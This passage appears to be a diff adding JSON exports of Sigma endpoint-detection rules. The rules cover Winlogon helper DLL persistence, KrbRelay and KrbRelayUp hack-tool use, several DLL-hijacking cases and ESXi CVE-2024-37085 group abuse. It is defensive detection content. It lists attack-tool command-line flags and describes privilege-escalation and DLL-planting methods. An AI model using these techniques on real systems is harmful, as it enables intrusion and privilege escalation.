'?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_userlock:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains: 
'?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE'\n\n exclusion_kerberos:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MIT_KFW\\DLLName'\n Details: '?:\\WINDOWS\\system32\\kfwlogon.dll'\n\n exclusion_wkplogin:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\WPKGLogon\\DLLName'\n Details: '?:\\Program Files\\wpkg\\wpkglogon.dll'\n\n exclusion_resavista:\n ProcessImage|endswith: '\\RESAVistaIDSClient.exe'\n TargetObject:\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details|endswith: '\\RESAVistaIDSClient.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "20feacae-9a99-4ce6-8f8c-c02176cb730a", + "rule_name": "Winlogon Helper DLL Installed", + "rule_description": "Detects a change of the Winlogon configuration via registry modification.\nAttackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n", + "rule_creation_date": "2020-09-24", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1547.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21030089-c22d-4b59-9389-818ed924fae4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + 
"rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095808Z", + "creation_date": "2026-03-23T11:45:34.095810Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095815Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/cube0x0/KrbRelay/", + "https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/", + "https://attack.mitre.org/techniques/T1558/003/", + "https://attack.mitre.org/techniques/T1550/003/" + ], + "name": "t1558_003_krbrelay_hacktool_usage.yml", + "content": "title: KrbRelay HackTool Executed\nid: 21030089-c22d-4b59-9389-818ed924fae4\ndescription: |\n Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\n KrbRelay has already been used by attackers to perform various Active Directory attacks.\n It is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\nreferences:\n - https://github.com/cube0x0/KrbRelay/\n - https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/\n - 
https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2023/07/06\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelay\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelay.exe'\n - OriginalFileName: 'KrbRelay.exe'\n\n selection_cmd_default:\n CommandLine|contains|all:\n - ' -spn '\n - ' -clsid '\n\n selection_cmd_option:\n CommandLine|contains:\n - ' -rbcd '\n - ' -shadowcred'\n - ' -add-groupmember '\n - ' -laps'\n - ' -ssl'\n - ' -console'\n - ' -add-privileges '\n - ' -secrets'\n - ' -service-add '\n - ' -session '\n\n selection_cmd_llmnr:\n CommandLine|contains|all:\n - ' -llmnr'\n - ' -spn '\n - ' -secrets'\n\n selection_cmd_ntlm:\n CommandLine|contains|all:\n - ' -session '\n - ' -clsid '\n - ' -ntlm'\n\n condition: selection_krb_name or (selection_cmd_default and selection_cmd_option) or selection_cmd_llmnr or selection_cmd_ntlm\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21030089-c22d-4b59-9389-818ed924fae4", + "rule_name": "KrbRelay HackTool Executed", + "rule_description": "Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\nKrbRelay has already been used by attackers to perform various Active Directory attacks.\nIt is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\n", + "rule_creation_date": "2023-07-06", + "rule_modified_date": "2025-01-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + 
"attack.credential_access", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1550.003", + "attack.t1558.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21167834-ee25-40c7-a927-f927643c10a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.599004Z", + "creation_date": "2026-03-23T11:45:34.599007Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.599015Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_iisexpresstray.yml", + "content": "title: DLL Hijacking via iisexpresstray.exe\nid: 21167834-ee25-40c7-a927-f927643c10a8\ndescription: |\n Detects potential Windows DLL Hijacking via iisexpresstray.exe.\n DLL hijacking takes advantage of the default Windows search order by 
positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iisexpresstray.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21167834-ee25-40c7-a927-f927643c10a8", + "rule_name": "DLL Hijacking via iisexpresstray.exe", + "rule_description": "Detects potential Windows DLL Hijacking via iisexpresstray.exe.\nDLL hijacking takes advantage of the 
default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2023-09-05", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21216328-38a3-45d2-b301-ea234729a5e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.610112Z", + "creation_date": "2026-03-23T11:45:34.610116Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.610123Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/", + "https://attack.mitre.org/techniques/T1078/002" + ], + "name": "t1078_002_possible_cve_2024_37085_exp_group.yml", + "content": "title: Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass\nid: 21216328-38a3-45d2-b301-ea234729a5e0\ndescription: |\n Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\n VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\n This group is not a built-in group in Active Directory and does not exist by default.\n It is recommended to investigate and determine if this is a legitimate administrative action.\nreferences:\n - https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/\n - https://attack.mitre.org/techniques/T1078/002\ndate: 2024/07/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2024-37005\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2024-37005\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID:\n - 4727 # Security-enabled Global Group was Created\n - 4728 # Member was Added to Security-enabled Global Group\n - 4755 # Security-enabled Universal Group was Created\n - 4756 # Member was Added to Security-enabled Universal Group\n GroupName: 'ESX Admins'\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21216328-38a3-45d2-b301-ea234729a5e0", + "rule_name": "Possible Exploitation of ESXi CVE-2024-37085 Authentication 
Bypass", + "rule_description": "Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\nVMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nThis group is not a built-in group in Active Directory and does not exist by default.\nIt is recommended to investigate and determine if this is a legitimate administrative action.\n", + "rule_creation_date": "2024-07-30", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1078.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098621Z", + "creation_date": "2026-03-23T11:45:34.098623Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098627Z", + "rule_level": "high", + "rule_confidence": "strong", + 
"rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_multidigimon.yml", + "content": "title: DLL Hijacking via multidigimon.exe\nid: 21364c07-fc54-4cf0-8a5e-4dd14ed9910d\ndescription: |\n Detects potential Windows DLL Hijacking via multidigimon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'multidigimon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\NInput.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n 
Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d", + "rule_name": "DLL Hijacking via multidigimon.exe", + "rule_description": "Detects potential Windows DLL Hijacking via multidigimon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2140fee8-47d6-4020-b659-5713bfec9a3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": 
"b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075299Z", + "creation_date": "2026-03-23T11:45:34.075301Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.075305Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19", + "https://attack.mitre.org/techniques/T1558/003/", + "https://attack.mitre.org/techniques/T1550/003/" + ], + "name": "t1558_003_krbrelayup_tool_usage.yml", + "content": "title: KrbRelayUp HackTool Executed\nid: 2140fee8-47d6-4020-b659-5713bfec9a3c\ndescription: |\n Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\n This tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\n It automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\n The tool also includes support for shadow credentials, eliminating the need for additional machine accounts. 
Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\n It is recommended to check the context of use of this tool and to look for other malicious actions on the host.\n If no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\nreferences:\n - https://github.com/Dec0ne/KrbRelayUp\n - https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2022/08/03\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelayUp\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelayUp.exe'\n - OriginalFileName: 'KrbRelayUp.exe'\n\n selection_cmd_relay:\n CommandLine|contains: ' relay '\n\n selection_cmd_spawn:\n CommandLine|contains: ' spawn '\n\n selection_cmd_krbscm:\n CommandLine|contains: ' krbscm '\n\n selection_cmd_domain:\n CommandLine|contains:\n - ' -d '\n - ' --Domain '\n - ' -Domain '\n\n selection_cmd_cn:\n CommandLine|contains:\n - ' -cn '\n - ' --ComputerName '\n - ' -ComputerName '\n\n selection_cmd_service_command:\n CommandLine|contains:\n - ' -s '\n - ' -sc '\n - ' --ServiceName '\n - ' --ServiceCommand'\n - ' -ServiceName '\n - ' -ServiceCommand'\n\n condition: selection_krb_name or\n ((selection_cmd_relay or selection_cmd_spawn) and selection_cmd_domain and selection_cmd_cn) or\n (selection_cmd_krbscm and selection_cmd_service_command)\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": 
"2140fee8-47d6-4020-b659-5713bfec9a3c", + "rule_name": "KrbRelayUp HackTool Executed", + "rule_description": "Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\nThis tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\nIt automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\nThe tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\nIt is recommended to check the context of use of this tool and to look for other malicious actions on the host.\nIf no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\n", + "rule_creation_date": "2022-08-03", + "rule_modified_date": "2025-02-13", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1550.003", + "attack.t1558.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21699dd6-a401-4ab8-bbda-d513d587c561", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593663Z", + "creation_date": "2026-03-23T11:45:34.593667Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593675Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/0gtweet/status/1564131230941122561", + "https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_phantom_dll_hijacking_deviceenroller.yml", + "content": "title: Phantom DLL Hijacking via DeviceEnroller.exe\nid: 21699dd6-a401-4ab8-bbda-d513d587c561\ndescription: |\n Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\n Phantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\n Attackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1564131230941122561\n - https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/30\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - 
classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'deviceenroller.exe'\n ProcessCommandLine|contains: 'PhoneDeepLink'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\ShellChromeAPI.dll'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21699dd6-a401-4ab8-bbda-d513d587c561", + "rule_name": "Phantom DLL Hijacking via DeviceEnroller.exe", + "rule_description": "Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\nPhantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\nAttackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-08-30", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2169b294-00f6-4185-922a-6e8744093010", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627015Z", + "creation_date": "2026-03-23T11:45:34.627017Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627021Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_002_dll_hijacking_obs_ffmpeg_mux.yml", + "content": "title: DLL Hijacking via obs-ffmpeg-mux.exe\nid: 2169b294-00f6-4185-922a-6e8744093010\ndescription: |\n Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/01/08\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - 
attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessName: 'obs-ffmpeg-mux.exe'\n ProcessSignature: 'Hugh Bailey'\n ImageLoaded|endswith: '\\obs.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\obs-studio\\bin\\64bit\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hugh Bailey'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2169b294-00f6-4185-922a-6e8744093010", + "rule_name": "DLL Hijacking via obs-ffmpeg-mux.exe", + "rule_description": "Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious 